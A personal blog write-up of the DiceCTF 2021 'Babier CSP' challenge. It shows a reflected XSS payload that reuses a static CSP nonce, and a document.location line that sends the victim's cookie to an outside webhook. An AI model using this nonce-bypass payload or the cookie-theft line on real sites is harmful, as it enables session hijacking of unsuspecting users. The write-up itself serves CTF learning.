Babier CSP: A Great beginner XSS challenge
From DiceCTF 2021
I had some time this weekend so i decided to play DiceCTF 2021. Babier CSP was a CTF i encountered. On first look, it’s your average XSS challenge with an addition of checking the nonce. Don’t let the word “nonce” scare you. I will try my best to simplify this challenge for you.
This is how the website looked like:
On first look, it’s clear that the parameter “name” in the link has the potential to inject some good old unfiltered input into it.
Now, Let’s try to see if we can inject HTML through this input.
As you can see, I tried
I will use the payload
</h1> tag to close the h1 tag before it and
<!-- is just to comment whatever comes after so that i don’t have to worry about whatever is after it. In HTML to close the comment we need to use
--> but HTML is smart enough to automatically make up for it.
Alright great. From the source code we can confirm that the script tags have been successfully injected. But upon loading i didn’t see the expected alert pop-up. Instead i was greeted with something like this:
A blank page. Weird. I mean, we injected everything successfully as seen in the source code. The name of the challenge is babier CSP not babier XSS after all. So let’s look for some explanation in the console.
Refused to execute inline script because it violates the following Content Security Policy directive: “script-src ‘nonce-LRGWAXOY98Es0zz0QOVmag==’”. Either the ‘unsafe-inline’ keyword, a hash (‘sha256-bhHHL3z2vDgxUt0W3dWQOrprscmda2Y5pLsLg4GF+pI=’), or a nonce (‘nonce-…’) is required to enable inline execution.
Now the vulnerability in this CTF is that the nonce itself isn’t being used once. You can verify by reloading the page and noticing how the nonce attribute always has the same value [LRGWAXOY98Es0zz0QOVmag==] EVERY time you reload the page.
Nice. We can further verify this by going through the provided
The form of XSS that we are using is called Reflected XSS. You can learn about types of XSS here.
In reflected XSS, you can send a link to the victim and the link itself contains the payload that gets executed. For example, https://babier-csp.dicec.tf/?name=%3C/h1%3E%3Cscript%20nonce=LRGWAXOY98Es0zz0QOVmag==%3Ealert(1)%3C/script%3E%3C!-- how this link itself has our payload and it’s not stored anywhere. It gets executed because it reflects the parameters in the link.
Anyway, back to stealing cookies and clapping some cheeks.
Usually you need a server to steal cookies with XSS but https://requestbin.com/ makes your life so much easier by assigning you an endpoint you can send requests to and see the request details.
Using that site, I generated a random webhook.
document.location= "https://envn9mg1xs9204g.m.pipedream.net/?cookie=" + document.cookie
This payload basically redirects the victim’s browser to your webhook’s link and sends the parameter “cookie” with the value of the victim’s cookie.
So the payload link ends up being:
Great. Also heads up, remember that links have their respective encoding. If things screw up, Just replace the “+” you used in the code with “%2B” like i did or it will be considered a space instead.
I verified that the link works. Now it’s time to send it to the bot.
And now let’s check the latest request sent to our webhook.
Great! We have the cookie as
Now this part doesn’t really make sense but it’s fine.
Again referencing back to index.js provided to us, We can see that there is a secret endpoint which is basically the value of the cookie.
oh yeah! i think we are close boys.
And that’s the flag! What a sweet little CTF :D. Also Ps Adult CSP didn’t even have a website it was a pwn challenge. I was too lazy to try anything else so i didn’t. I have a school to manage guys don’t blame me.
Remember this screenshot from a bit up? So favicon.ico is fetched by default by your browser. It shows an error due to the CSP because it is set to
So this is some hardcore filtering. The website can’t fetch an image until and unless it’s pretty much whitelisted. That is why that other error came. It wasn’t whitelisted yet your browser tries to fetch it by default and that makes the CSP go “no go off i don’t trust this random file it’s not been whitelisted”.
If you liked the article, then feel free to follow me on twitter here. Feel free to drop some feedback there as well. Be kind while giving the feedback :>
I also run a community of hackers on discord. Here is the invite link to it: https://discord.gg/hyrSjqWXyH
Feel free to drop by to hangout, learn and contribute :D
We also have our lil CTFs there with a public leaderboard where you can learn new things and practice your skills.